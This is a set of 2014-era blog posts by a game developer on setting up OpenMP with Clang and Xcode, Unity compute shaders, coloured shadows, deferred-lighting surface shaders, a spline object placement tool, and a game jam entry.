So with that in mind, today’s article is all about how to set up OpenMP on Mavericks and get it working with a Makefile in Xcode 5; it’s a heck of a lot more involved than I originally anticipated. I suppose one caveat of this post is that most of the information here is taken from other places (which I’ve linked to), I’m just collecting it all in one place for the next person who wants to do this.

Extreme Yak Shaving

The first step to getting OpenMP up and running on Mavericks is to install a new compiler. No joke. The version of Clang installed on your system doesn’t support OpenMP, and Apple very quietly replaced gcc with a symlink to Clang with XCode 5, so we’re starting this process up a bit of a creek.

There are 2 commonly recommended options at this point. Probably the most logical solution is to simply install GCC 4.9 using Homebrew or Macports (or build it yourself if that turns your crank), but the Homebrew recipe for GCC 4.9 was broken at the time of writing this, and while I was looking for how to grab it from MacPorts I came across OpenMP®/Clang.

OpenMP®/Clang, unsurprisingly, is a modified version of Clang which supports OpenMP. Given that I’m already used to using Clang this seemed like a great idea, especially since the website is active, and indicates that the plan is to eventually contribute to the Clang trunk. May as well jump on the bandwagon early.

Installing OpenMP®/Clang

This part is tricky, but luckily StackOverflow has our back. If you check out this post you can find a script that user Jason Parham wrote for automating the process of installing / configuring the tools we need (namely OpenMP®/Clang, and the OpenMP® runtime itself). I modified the paths that everything got built to, but otherwise the steps I took mimic that script almost exactly.

One thing to pay attention to is that the script above will bind the new version of clang to the commands “clang2” and “clang2++,” which is great because it means we don’t have to screw with the moderately important command currently bound to “clang.”

Aside from that though, that script should take care of a lot of the heavy lifting needed to get us going.

Clang2 and XCode

If you’re happy just using Makefiles by themselves you can actually just stop here and use them to build you projects (remembering to use the -fopenmp flag), but I still wanted to use XCode as a front end for the llvm debugger so my odyssey continued for a bit. If that sounds like something you want too, the rest of this article will outline how to get that working.

Setting up a makefile based project in XCode is (relatively) straightforward:

Create a new project like normal, choosing whatever template makes sense.
Go to your project settings and delete the pre-generated target(s) for your application
Create a new target of type “External Build System”
Create a makefile for your project and put it somewhere in your project directory
In your Build Tool Configuration page, set the directory to wherever you’ve chosen to store your makefile, and set the arguments to “-f NAME_OF_YOUR_MAKEFILE”

If you’ve followed those steps, your Build Tool Configuration page should look something like the following:

Great. Next up is to actually write the makefile. For the most part this is the same as any other makefile, except that you need to specify “clang2” as the compiler, and include the -fopenmp flag when you compile files that include OpenMP. A really simple makefile that does this might look like the following:

We’re almost there, but XCode isn’t through with us yet. If you try to build now, you’ll notice that it fails spectacularly and spits out a cryptic error that boils down to not knowing what the heck “clang2” is. This is because for some reason XCode doesn’t read the PATH variables that we set up in that script ealier, so we need to tell it where to find our compiler.

I’m sure theres a better way of doing this, but after a couple of hours of banging my head against a wall, I’ve resigned to launching XCode from the command line like so:

$ source ~/.profile
$ open -a "Xcode"

This will open XCode with the path variables we need set up properly. If you like Spotlight as much as I do, I recommend wrapping these in an Automator application so you can run these commands from there.

If you build from the XCode that was opened from the command line, you should finally we able to run your program. If you’re looking for a good test, I recommend the example found on clang-opm.github.io. If OpenMP is running correctly, you should be able to see the printf statement get executed from multiple threads when that file is run.

Normally this is where I tell you to contact me with any questions, but I fear that I’m as in the dark about this as you are right now, although hopefully that changes over the next few weeks. In any case, you can get a hold of me on twitter if you want to say hi. Happy Coding!

Getting Started With Compute Shaders In Unity

2014-06-27T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number

I love the simplicity of vert/frag shaders; they only do one thing (push verts and colors to the screen), and they do it exceptionally well, but sometimes, that simplicity feels limiting and you find yourself staring at a loop of matrix calculations happening on your CPU trying desperately to figure out how you could store them in a texture…

…Or maybe that’s just me, but regardless, compute shaders solve that problem, and it turns out that they’re dead simple to use, so I’m going to explain the basics of them today. First I’ll go through the example compute shader that unity auto creates for you, and then I’ll finish off with an example of a compute shader working with a structured buffer of data.

Compute shaders can be used to control the positions of particles

What the Heck is a Compute Shader?

Simply put, a compute shader is a is a program executed on the GPU that doesn’t need to operate on mesh or texture data, works inside the OpenGL or DirectX memory space (unlike OpenCL which has its own memory space), and can output buffers of data or textures and share memory across threads of execution.

Right now Unity only supports DirectX11 compute shaders, but once everyone catches up to OpenGL 4.3, hopefully us mac lovers will get them too :D

This means that this will be my first ever WINDOWS ONLY tutorial. So if you don’t have access to a windows machine, the rest of this probably won’t be helpful.

What are they good for? (and what do they suck at?)

Two words: math and parallelization. Any problem which involves applying the same (no conditional branching) set of calculations to every element in a data set is perfect. The larger the set of calculations, the more you’ll reap the rewards of doing things on your GPU.

Conditional branching really kills your performance because GPUs aren’t optimized to do that, but this is no different from writing vertex and fragment shaders so if you have some experience with them this will be old hat.

There’s also the issue of latency. Getting memory from the GPU back to your CPU takes time, and will likely be your bottleneck when working with compute shaders. This can be somewhat mitigated by ensuring that you optimize your kernels to work on the smallest buffers possible but it will never be totally avoided.

Got it? Good. Let's get started.

Since we’re working with DirectX, Unity’s compute shaders need to be written in HLSL, but it’s pretty much indistinguishable from the other shader languages so if you can write Cg or GLSL you’ll be fine (this was my first time writing HLSL too).

The first thing you need to do is create a new compute shader. Unity’s project panel already has an option for this, so this step is easy. If you open up that file, you’ll see the following auto generated code (i’ve removed the comments for brevity):

#pragma kernel CSMain

RWTexture2D<float4> Result;

[numthreads(8,8,1)]
void CSMain (uint3 id : SV_DispatchThreadID)
{
    Result[id.xy] = float4(id.x & id.y, (id.x & 15)/15.0, (id.y & 15)/15.0, 0.0);
}

This is a really good place to start figuring out compute shaders, so let’s go through it line by line:

#pragma kernel CSMain

This specifies the entry point to the program (essentially the compute shader’s “main”). A single compute shader file can have a number of these functions defined, and you can call whichever one you need from script.

RWTexture2D<float4> Result;

This declares a variable that contains data the shader program will work wth. Since we aren’t working with mesh data, you have to explicitly declare what data your compute shader will read and write to. The “RW” in front of the datatype specifies that the shader will both read and write to that variable.

[numthreads(8,8,1)]

This line specifies the dimensions of the thread groups being spawned by our compute shader. GPUs take advantage of the massive parallel processing powers of the GPU by creating threads that run simultaneously. Thread groups specify how to organize these spawned threads. In the code above, we are specifying that we want each group of threads to contain 64 threads, which can be accessed like a 2D array.

Determining the optimum size of your thread groups is a complicated issue, and is largely related to your target hardware. In general, think of your gpu as a collection of stream processors, each of which is capable of executing X threads simultaneously. Each processor runs 1 thread group at a time, so ideally you want your thread group to contain X threads to take best advantage of the processor. I’m still at the point where I’m playing with these values to really get a handle on them, so rather than dispense advice on how best to set these values, I’ll leave it up to you to google (and then share on twitter :D ).

The rest of the shader is pretty much regular code. The kernel function determines what pixel it should be working on based on the id of the thread running the function, and writes some data to the Result buffer. Easy right?

Actually Running The Shader

Obviously we can’t attach a compute shader to a mesh and expect it to run, especially since it isn’t working with mesh data. Compute shaders actually need to be set up and called from scripts, which looks like this:

public ComputeShader shader;

void RunShader()
{
int kernelHandle = shader.FindKernel("CSMain");

RenderTexture tex = new RenderTexture(256,256,24);
tex.enableRandomWrite = true;
tex.Create();

shader.SetTexture(kernelHandle, "Result", tex);
shader.Dispatch(kernelHandle, 256/8, 256/8, 1);
}

There are a few things to note here. First is setting the enableRandomWrite flag of your render texture BEFORE you create it. This gives your compute shaders access to write to the texture. If you don’t set this flag you won’t be able to use the texture as a write target for the shader.

Next we need a way to identify what function we want to call in our compute shader. The FindKernel function takes a string name, which corresponds to one of the kernel names we set up at the beginning of our compute shader. Remember, a Compute Shader can have multiple kernels (functions) in a single file.

The ComputeShader.SetTexture call lets us move the data we want to work with from CPU memory to GPU memory. Moving data between memory spaces is what will introduce latency to your program, and the amount of slowdown you see is proportional to the amount of data that you are transferring. For this reason, if you plan on running a compute shader every frame you’ll need to aggressively optimize how much data is actually get operated on.

The three integers passed to the Dispatch call specify the number of thread groups we want to spawn. Recall that each thread group’s size is specified in the numthreads block of the compute shader, so in the above example, the number of total threads we’re spawning is as follows:

32*32 thread groups * 64 threads per group = 65536 threads total.

This ends up equating to 1 thread per pixel in the render texture, which makes sense given that the kernel function can only operate on 1 pixel per call.

So now that we know how to write a compute shader that can operate on texture memory, let’s see what else we can get these things to do.

Structured Buffers Are Freaking Sweet

Modifying texture data is a bit too much like vert/frag shaders for me to get too excited; it’s time to unshackle our GPU and get it working on arbitrary data. Yes it’s possible, and it’s as awesome as it sounds.

A structured buffer is just an array of data consisting of a single data type. You can make a structured buffer of floats, or one of integers, but not one of floats and integers. You declare a structured buffer in a compute shader like this:

StructuctedBuffer<float> floatBuffer;
RWStructuredBuffer<int> readWriteIntBuffer;

What makes these buffers more interesting though, is the ability for that data type to be a struct, which is what we’ll do for the second (and last) example in this article.

For our example, we’re going to be passing our compute shader a set of points, each of which has a matrix that we want to transform it by. We could accomplish this with 2 separate buffers (one of Vector3s and one of Matrix4x4s), but it’s easier to conceptualize a point/matrix pair if they’re together in a struct, so let’s do that.

In our c# script, we’ll define the data type as follows:

struct VecMatPair
{
public Vector3 point;
public Matrix4x4 matrix;
}

We also need to define this data type inside our shader, but HLSL doesn’t have a Matrix4x4 or Vector3 type. However, it does have data types which map to the same memory layout. Our shader might end up looking like this:

#pragma kernel Multiply

struct VecMatPair
{
	float3 pos;
	float4x4 mat;
};

RWStructuredBuffer<VecMatPair> dataBuffer;

[numthreads(16,1,1)]
void Multiply (uint3 id : SV_DispatchThreadID)
{
    dataBuffer[id.x].pos = mul(dataBuffer[id.x].mat,
    				float4(dataBuffer[id.x].pos, 1.0));
}

Notice that our thread group is now organized as a 1 dimensional array. There is no performance impact regarding the dimensionality of the thread group, so you’re free to choose whatever makes the most sense for your program.

Setting up a structured buffer in a script is a bit different from the texture example we did earlier. For a buffer, you need to specify how many bytes a single element in the buffer is, and store that information along with the data itself inside a compute buffer object. For our example struct, the size in bytes is simply the number of float values we are storing (3 for the vector, 16 for the matrix) multiplied by the size of a float (4 bytes), for a total of 76 bytes in a struct. Setting this up in a compute buffer looks like this:

public ComputeShader shader;

void RunShader()
{
	VecMatPair[] data = new VecMatPair[5];
	//INITIALIZE DATA HERE

	ComputeBuffer buffer = new ComputeBuffer(data.Length, 76);
	buffer.SetData(data);
	int kernel = shader.FindKernel("Multiply");
	shader.SetBuffer(kernel, "dataBuffer", buffer);
	shader.Dispatch(kernel, data.Length, 1,1);
}

Now we need to get this modified data back into a format that we can use in our script. Unlike the example above with a render texture, structured buffers need to explicitly be transferred from the GPU’s memory space back to the CPU. In my experience, this is the spot where you’ll notice the biggest performance hit when using compute shaders, and the only ways I’ve found to mitigate it are to optimize your buffers so that they’re as small as possible while still being useable and to only pull data out of your shader when you absolutely need it.

The actual code to get the data back to the cpu is actually really simple. All you need is an array of the same data type and size as the buffer’s data to write to. If we modified the above script to write the resulting data back to a second array, it might look like this:

public ComputeShader shader;

void RunShader()
{
VecMatPair[] data = new VecMatPair[5];
VecMatPair[] output = new VecMatPair[5];

//INITIALIZE DATA HERE

ComputeBuffer buffer = new ComputeBuffer(data.Length, 76);
buffer.SetData(data);
int kernel = shader.FindKernel("Multiply");
shader.SetBuffer(kernel, "dataBuffer", buffer);
shader.Dispatch(kernel, data.Length, 1,1);
buffer.GetData(output);
}

That’s really all there is to it. You may need to watch the profiler for a bit to get a sense of exactly how much time you’re burning transferring data to and from the cpu, but I’ve found that once you’re operating on a big enough data set compute shaders really pay dividends.

One last thing - once you’re done working with your buffer, you should call buffer.Dispose() to make sure the buffer can be GC’ed. (Thanks to Andreas S for e-mailing me with this addition, and a few other corrections!).

If you have any questions about this (or spot a mistake in what’s here), send me a send me a message on twitter. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!

Colouring Shadows in Unity

2014-05-16T00:00:00+00:00

If you’ve ever looked for help getting different coloured shadows in your Unity game, you were probably surprised by how little there is on the forums in the way of help. In fact, at the time of writing this, the most help that google turned up was a $50 package on the asset store. Colouring shadows is not that hard, in fact, it’s only a few lines of shader code.

This post is going to show you a really simple way to get some really groovy shadows in Unity.

I added water to make this seem more impressive.

Time to Get Fabulous

To make this simple, we’re going to be writing a surface shader today. It’s important to note that the shader we’re writing will set the colour of the shadows being received by the object being shaded, not the colour of the shadows cast by that object onto others. If you want the ground to show coloured shadows, the ground needs to have a shadow colouring shader. In the image above, both the sphere and the ground have the shader applied.

Let’s add coloured shadows to the default diffuse shader that comes with unity. First off, we’ll need the source for that. You can grab the source for all the built in shaders in Unity from their downloads page.

The default diffuse shader is in a file called Normal-Diffuse.shader. So let’s open it up, and copy the contents into a new shader in Unity:

Shader "Colored Diffuse" {
Properties {
	_Color ("Main Color", Color) = (1,1,1,1)
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader {
	Tags { "RenderType"="Opaque" }
	LOD 200

CGPROGRAM
#pragma surface surf Lambert

sampler2D _MainTex;
fixed4 _Color;

struct Input {
	float2 uv_MainTex;
};

void surf (Input IN, inout SurfaceOutput o) {
	fixed4 c = tex2D(_MainTex, IN.uv_MainTex) * _Color;
	o.Albedo = c.rgb;
	o.Alpha = c.a;
}
ENDCG
}

Fallback "VertexLit"
}

If you throw this on a material it should, unsurprisingly, look exactly like the “Diffuse” shader that comes with Unity. Now it’s time to have some fun. We’re going to need to write our own lighting function to get the shadows the colour we want them. Right now the shader is using the built in “Lambert” function, and ideally, our lighting should look exactly like it, just more fabulous. The easiest way to do this is to just grab the source for the Lambert function and modify that directly.

That built in shaders folder you downloaded also has the source code for the lighting functions (inside the file Lighting.cginc). If you open it up, and ctrl+f for “Lambert” you’ll find what we’re looking for. Let’s paste that into our shader as well:

CGPROGRAM
#pragma surface surf CSLambert
sampler2D _MainTex;

struct Input {
	float2 uv_MainTex;
};

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) {

	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	c.a = s.Alpha;
	return c;
	}

void surf (Input IN, inout SurfaceOutput o) {
	half4 c = tex2D (_MainTex, IN.uv_MainTex);
	o.Albedo = c.rgb;
	o.Alpha = c.a;
}

ENDCG

You’ll notice I changed the name of the lighting function (and the #pragma line which specifies which function to use). This is just to avoid confusion with the original Lambert function.

The lighting function is responsible for outputting the final colour of the object, which includes the colour of the shadowed area. The atten term you see above is the shadow multiplier. The higher the atten value, the brighter the surface, a low value points to the fragment being in shadow. The lower the atten value, the darker the shadows.

Since we know that any atten value less than 1.0 means that the fragment is in shadow, subtracting atten from 1.0 will give us the strength that the shadow colour needs to be. Lighter shadows (a higher atten) will naturally have a lighter shadow colour.

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) 
{

	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	
	//shadow colorization
	c.rgb += _ShadowColor.xyz * (1.0-atten);
	
	c.a = s.Alpha;
	return c;
}

Make sure that you also add the _ShadowColor color property to the shader, and as a uniform inside your CG Program. Then throw this shader onto one of your objects, and watch the magic happen.

You may have noticed that the above change doesn’t account for diffuse shadows, that is, unlit sides of a diffuse material. You end up with a really weird looking dissonance between the object’s dark areas, and the areas that are receiving shadows.

Notice the difference between the areas being self shadowed, and the areas that are unlit.

This happens because although the atten value tell us if we’re being shadowed by another object, it doesn’t account for a fragment being dark as a result of it’s own lighting function. In the case of a diffuse material, this is when it is pointing away from all relevant light sources.

What we need is to have our shadow colouring take into account both the atten value and the lighting. We can do that like so:

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) 
{
	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	
	//shadow colorization
	c.rgb += _ShadowColor.xyz * max(0.0,(1.0-(diff*atten*2))) * _DiffuseVal;
	c.a = s.Alpha;
	return c;
}

Put it all together and you should end up with the most fabulous shadow colours you’ve ever seen!

Extending this to other shaders is very similar to what we did here, simply grab the source for the shader you want to modify from the built in shader source, and modify the lighting function to add shadow colour based on that specific lighting function’s equation.

Writing Shaders for Deferred Lighting in Unity3D

2014-04-05T00:00:00+00:00

Awhile ago, I wrote a post called Writing Multi Light Pixel Shaders in Unity, and covered the basics of how to write shaders that use a whole bunch of lights in forward rendering. This post is the (8 months late) sequel to that post, in which I’m going to talk about the basics of writing shaders for deferred lighting in Unity.

Unlike last time though, we’re going to be writing surface shaders today; I’ll explain why that is below. If you’re unfamiliar with surface shaders, now would probably be a good time to head over to the Unity docs and read up a little bit. Don’t worry about grokking all of it though, we aren’t doing anything fancy today.

If you’re dead set on writing pixel shaders that work with deferred lighting, check out my post on that here

A quick demo of deferred lighting: all 16 lights in the scene are treated as pixel lights

It seems easiest to start by describing how forward rendering and deferred lighting work so that we can see how they differ from one another, and understand what our shaders are actually doing in the deferred rendering path.

A Very Brief Intro to Forward Rendering

In traditional forward rendering, each object is drawn once for every pixel light that touches it (with all the vertex lights being lumped into the base pass). Each pass works independently of the other passes, and runs a vertex and a fragment shader to do its magic (and then adds that result to the previous passes).

This works great for simple scenes, but when you need to have a large number of lights it can get bogged down pretty quickly. To use draw calls as an example: in forward rendering your draw call count is (roughly) numberOfObjects * numberOfLights.

For example: the screenshot above has 16 spheres, each being lit by 16 pixel lights, predictably, this results in 256 draw calls, as shown in the stats window:

Normally unity would be using a bunch of tricks to minimize those draw calls, by batching calls, and automatically setting some lights to vertex lights, but I’ve turned all that off for demonstration purposes.

So if forward rendering chokes with tons of lights, how do games render scenes with hundreds of lights in them? That’s where deferred techniques come in.

A Brief Intro to Deferred Lighting

Deferred lighting solves the problem of handling a large number of lights by assuming that all objects use the same lighting model, and then calculating the lighting contribution to each pixel on the screen in a single pass. This allows the rendering speed to be dependent on the number of pixels being rendered, not the objects in the scene.

As described in greater detail in the docs, Unity’s deferred lighting system is a 3 step process.

Step 1: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).
Step 2: the previously built buffers are combined to compute the lighting for each pixel on the screen.

Step 3: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).

As you may have guessed, this technique comes with much more overhead than forward rendering, but it also scales much better for complex scenes. To relate things back to draw calls, each object produces 2 draw calls, and each light produces 1 call (+1 for lightmapping). Thus, the example scene from above ends up being roughly 16 ∗ 2 + 16 ∗ 2. Unity’s window says 65 draw calls, don’t ask me where that extra one came from.

It’s worth noting that draw calls really aren’t a great way to measure how performant a rendering technique is, but they’re a useful way to understand how these techniques differ from one another. In actuality, it’s more useful to say that forward rendering’s performance is dependent on the number of lights and objects in a scene, whereas deferred lighting’s performance is dependent on the number of lights and the number of pixels being lit on the screen.

One final thing: Unity uses “deferred lighting” (aka Light Pre-Pass), which is different from the confusingly similar named “deferred rendering.” I won’t go into the differences here, but just be aware of this so you’re not confused later.

So about those shaders...

As you also may have noticed from the above description, deferred lighting assumes that all objects use the same lighting model. This doesn’t mean that objects can’t appear to be lit differently, but it does mean that things like light attenuation and how the diffuse and specular terms are calculation are uniform across all objects.

As such, one of the tradeoffs with deferred lighting is a loss of control in your shaders. Since the lighting model is uniform across all objects, we no longer get to define that per shader.

In light of this, surface shaders are the best way to tackle writing custom shaders for deferred lighting. They’re already set up to work with Unity’s system, and enforce the restrictions we’re working with by design.

Let's write something already

To start off, create a new shader. Unity will give you a skeleton of a surface shader. I’ll post it here for those of you not playing along at home:

Shader "Custom/DeferredDiffuse"
{
Properties 
{
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader 
{
	Tags { "RenderType"="Opaque" }
	LOD 200
	
	CGPROGRAM
	#pragma surface surf Lambert

	sampler2D _MainTex;

	struct Input {
		float2 uv_MainTex;
	};

	void surf (Input IN, inout SurfaceOutput o) {
		half4 c = tex2D (_MainTex, IN.uv_MainTex);
		o.Albedo = c.rgb;
		o.Alpha = c.a;
	}
	ENDCG
} 
}

Out of the box, Unity’s built in lighting functions already will all work fine with deferred lighting, so technically, the above is a fully functioning diffuse deferred shader.

Here’s how this plays out in deferred lighting (roughly):

The surface function defines all the material specific properties for this object
Unity computes the lighting buffer. If the surface function writes to a variable used in one of these buffers (like the fragment’s normal), the data for the buffer comes from the surface function instead of the raw geometry.
The Lambert lighting function controls how the lighting buffer and object’s surface properties get combined into the final output for the current fragment.

Now, using the built in Lambert lighting function is cheating a bit, so let’s see how to write our own diffuse lighting function:

float4 LightingMyDiffuse_PrePass(SurfaceOutput i, float4 light)
{
	return float4(i.Albedo * light.rgb, 1.0);
}

This is very similar to writing lighting functions for forward rendering. All you have to do is add “_PrePass” to the end of the function name, and change the input arguments to take the output struct from your surface function and a single float4 for the combined lighting at that pixel.

That’s really all there is to it. For completenesses sake, here’s the full shader, and how it looks:

Shader "Custom/DeferredDiffuse"
{
Properties 
{
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader 
{
	Tags { "RenderType"="Opaque" }
	LOD 200
	
	CGPROGRAM
	#pragma surface surf MyDiffuse

	sampler2D _MainTex;

	struct Input {
		float2 uv_MainTex;
	};

	void surf (Input IN, inout SurfaceOutput o) {
		half4 c = tex2D (_MainTex, IN.uv_MainTex);
		o.Albedo = c.rgb;
		o.Alpha = c.a;
	}
	
	float4 LightingMyDiffuse_PrePass(SurfaceOutput i, float4 light)
	{
		return float4(i.Albedo * light.rgb, 1.0);
	}
	ENDCG
} 
}

Conclusion

So there you have it, a custom diffuse shader for deferred lighting! Surface shaders really aren’t as much fun as regular pixel shaders (imo), but they definitely fit the bill in this case.

If you notice any errors, have a good system worked out for writing non surface shaders with Unity’s deferred path, or just want to say hi, send me a message on twitter. Happy coding!

A Spline Based Object Placement Tool

2014-03-30T00:00:00+00:00

I’m convinced that one of the secrets to levelling up your Unity skills is to become very comfortable writing custom editor tools. Every project I’ve worked on in the past year has been made significantly better by building tools to automate repetitive or time consuming tasks.

For example, imagine you are working on a project which requires placing gems at even distances (like coins in Temple Run, or rings in Sonic). Placing all of these by hand isn’t a good use of anyone’s time, and making changes to these layouts sucks because moving a gem in the middle of a row means that everything after it needs to be adjusted as well.

A tool that automatically places objects at even spaces along a spline would not only allow you to get the objects placed faster, but make it way easier to make changes later. This post is going to show you the basics of how to put a tool like this together.

(there’s a unitypackage download at the end of this post if you just want the code).

The General Idea

The tool we’re building is fairly simple, but there are a few different parts we need to set up. We’ll cover these in order:

A way to make a spline
A way to manipulate (and see) our spline
A way to place objects on the spline, and manage these objects

Making a Spline

I could probably write a few blog posts just covering different spline creation algorithms, but thankfully the Unity wiki has us covered here. Head over there and grab the Interpolate.cs script. This will handle all the complicated parts of creating our spline for us. All that’s left for us is to define the inputs.

If you look at Interpolate.cs, you’ll find the method that we’ll be using to generate our splines:

IEnumerable<Vector3> NewCatmullRom(Transform[] nodes, int slices, bool loop)

So the inputs we need are an array of node positions (the initial control points that will define the shape of our spline), the number of slices (points placed between these initial nodes), whether or not we want our spline to loop and finally the GameObject we want to duplicate along the path.

However, none of the logic regarding what these inputs are should be put into Interpolate.cs, which means it’s time for us to start writing our custom tool class.

Seeing and Manipulating the Spline

So as mentioned, the first thing our tool will need to do is provide inputs to the Interpolate class. So let’s set that up:

public class SplinePlacer : MonoBehaviour
{
	public Transform[] initialNodes;
	public int curveResolution;
	public bool loop;
	public GameObject objectToPlace;
}

You can go ahead and set these up in the inspector if you want, although you won’t see anything yet. so perhaps we should also set up the gizmos to visualize the spline. Gizmos (for those who are unfamiliar with them) are objects which are drawn in the scene view but do not appear in your actual game. We’re going to be using the Gizmo api to draw our spline.

To write a custom gizmo for a component, you need to override the OnDrawGizmos method. Let’s start by drawing a sphere at every initial node point, so that we don’t need the Transform objects we’re supplying to have a mesh renderer attached to them. The code below allocates an array of Vector3[]s that isn’t really being used in this example, but we will be using this array later, so I’ve included it now to avoid needing to change code as we go.

void OnDrawGizmos()
{
	Vector3[] initialPoints = new Vector3[initialNodes.Length];
	for (int i = 0; i < initialNodes.Length; i++)
	{
		initialPoints[i] = initialNodes[i].position;
		Gizmos.DrawWireSphere(initialPoints[i], 0.1f);
	}
}

If you switch back to the editor, and add a few empty GameObjects to the list of initialNodes, you should now have shiny wireframe spheres in the scene view to help you see what’s going on.

Great! Now let’s get on with the business of actually seeing our spline.

To do this, we need to create a spline on every call of the OnDrawGizmos method, and draw a line segment between each node on the newly created spline (we create a new spline on every call so that we can see the updates to the spline as we move the nodes in the scene view).

void OnDrawGizmos()
{
	if (initialNodes == null) return;
	if (initialNodes.Length < 2) return;

	Vector3[] initialPoints = new Vector3[initialNodes.Length];
	for (int i = 0; i < initialNodes.Length; i++)
	{
		initialPoints[i] = initialNodes[i].position;
		Gizmos.DrawWireSphere(initialPoints[i], 0.15f);
	}
	IEnumerable<Vector3> spline = Interpolate.NewCatmullRom(initialNodes, 
								curveResolution, 
								loop);
	IEnumerator iterator = spline.GetEnumerator();
	iterator.MoveNext();
	var lastPoint = initialPoints[0];
	while (iterator.MoveNext())
	{
		Gizmos.DrawLine(lastPoint, (Vector3)iterator.Current);
		lastPoint = (Vector3)iterator.Current;
		
		//prevent an infinite loop if we want our spline to loop
		if (lastPoint == initialPoints[0]) break;
	}
}

If you compile this, and throw a few control points into the inspector panel, you should be able to drag them around see something like this:

Although this looks cool, it really isn’t useful yet, which brings us to part 3:

Placing Objects on the Spline

The most common use case I’ve found for this type of tool is placing objects along the spline while setting up the scene (ie/ before runtime), so that’s what we’ll cover here.

I’ve found the most intuitive way to handle this is to write a custom inspector for the SplinePlacer class that draws a button that triggers the placement action. So lets do that now:

using UnityEngine;
using UnityEditor;
using System.Collections;
[CustomEditor(typeof(SplinePlacer))]
public class SplinePlacerEditor : Editor 
{
	public override void OnInspectorGUI()
	{
		DrawDefaultInspector();
		if (GUILayout.Button("Place Objects"))
		{
			SplinePlacer placer = (SplinePlacer)target;
			placer.PlaceObjects();
		}
	}
}

This code won’t compile yet, because we haven’t defined the PlaceObjects method in SplinePlacer, so go ahead and add an empty method with that name now. Once you’ve done that, throw this new inspector class into your Editor folder and let it compile. If you click back to your spline placer object it should look something like this:

Now all that’s left is to actually have PlaceObjects do something and we’re good to go. This gets a bit a hairy, especially because I’m duplicating a lot of code so that I can present a self contained method for this tutorial, but the algorithm is as follows:

Place an object at the first control point
Traverse a distance along the spline (our distance variable)
When we have moved far enough along, place another object
continue this process until we reach the end of the spline

And an implementation of this might look like this:

public void PlaceObjects()
{
//To make things easier to understand
//we're going to parse the spline into a 
//list of Vector3s instead of using the iterator
IEnumerable<Vector3> spline = Interpolate.NewCatmullRom(initialNodes, 
							curveResolution, 
							loop);
IEnumerator iterator = spline.GetEnumerator();
List<Vector3> splinePoints = new List<Vector3>();
while (iterator.MoveNext())
{
	splinePoints.Add((Vector3)iterator.Current);
}

//distanceToMove represents how much farther
//we need to progress down the spline before
//we place the next object
int nextSplinePointIndex = 1;
float distanceToMove = distanceBetweenObjects;

//our current position on the spline
Vector3 positionIterator = splinePoints[0];

//our algo skips the first control point, so 
//we need to manually place the first object
GameObject.Instantiate(objectToPlace, positionIterator, Quaternion.identity);
while(nextSplinePointIndex < splinePoints.Count)
{
	Vector3 direction = (splinePoints[nextSplinePointIndex] - positionIterator);
	direction = direction.normalized;
	float distanceToNextPoint = Vector3.Distance(positionIterator, 
						splinePoints[nextSplinePointIndex]);
	if (distanceToNextPoint >= distanceToMove)
	{
		positionIterator += direction*distanceToMove;

		GameObject.Instantiate(objectToPlace, 
						positionIterator, 
						Quaternion.identity);
		distanceToMove = distanceBetweenObjects;
	}
	else
	{
		distanceToMove -= distanceToNextPoint;
		positionIterator = splinePoints[nextSplinePointIndex++];
	}
}
}

Once this code compiles, pressing the “Place Objects” button should populate your spline with the object you provided to be duplicated.

YAY! :D

Where to go next

Depending on your needs, there are a ton of different ways to improve on this tool. One addition I’ve found useful is to bind a keyboard shortcut to the act of creating another initial node, adding it to the end of the list of nodes, and selecting it in the hierarchy. This simplifies the process of creating paths greatly.

Another option I’ve found handy in some cases is to automatically select all the spawned objects after placing them, allowing a really quick group edit of their components.

You may also want to write additional inspector buttons for doing things like deleting all spawned children, or serializing their positions, or any of a million other things that might make your specific use case better. There isn’t a “right” way to go about this, as long as your life is better when you’re done the tool.

If you’re running into any issues getting things to work, feel free to grab this unitypackage, which contains all of the code presented above. If you’re still running into issues, or you have tools of your own that you want to share, send me a message on twitter!

On Bacon Jam and Grilling Virtual Meat

2014-03-24T00:00:00+00:00

NOTE: This article is OLD! Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

Weekend game jams aren’t usually my thing. Generally speaking, I like having the weekend to recharge, and spending all of one getting little sleep and feverishly working to finish a (usually) throwaway project is not usually tempting. However, last weekend Reddit hosted the Bacon Jam, and I decided to partake since it had been awhile since I had actually finished a game and I felt like getting some momentum back.

The theme of the jam was “Hungry,” and I decided to make a game about grilling meat, because winter has been way too long and cold here in Ontario, and barbeque weather can’t get here fast enough. Although the jam technically ended on Sunday night, I knew that I had other things I needed to get done, and as such would be finishing on Saturday. I also knew I liked sleep, and had no intention of pulling a crazy caffeine fuelled coding binge (like I’ve done at most game jams). The end result was a very small game, that I finished leisurely well before the end of Saturday, and I ended up having a ton of fun doing things this way.

My entry for Bacon Jam 7

Everyone says set your scope small when you’re at a jam, but I think the real secret to enjoying a game jam (and not just finishing it) is to set your project’s scope small enough to be completed within the first half of the jam. If you’re still feeling in the groove, you now have a ton of time to polish your project, and if you aren’t, you can pack up, or socialize, or do whatever the hell you want, and you still walk out of the jam with a finished product.

Aside from discovering a new, much more enjoyable, way to jam, what I found interesting about this weekend was that my project would have been pretty much impossible for me to complete a year ago, given that the core mechanic relies on a shader to pan between three textures (raw, cooked, burnt) on each fragment of meat, and a year ago I was still about 2 months out from really getting anywhere with shader dev. What a difference a year makes!

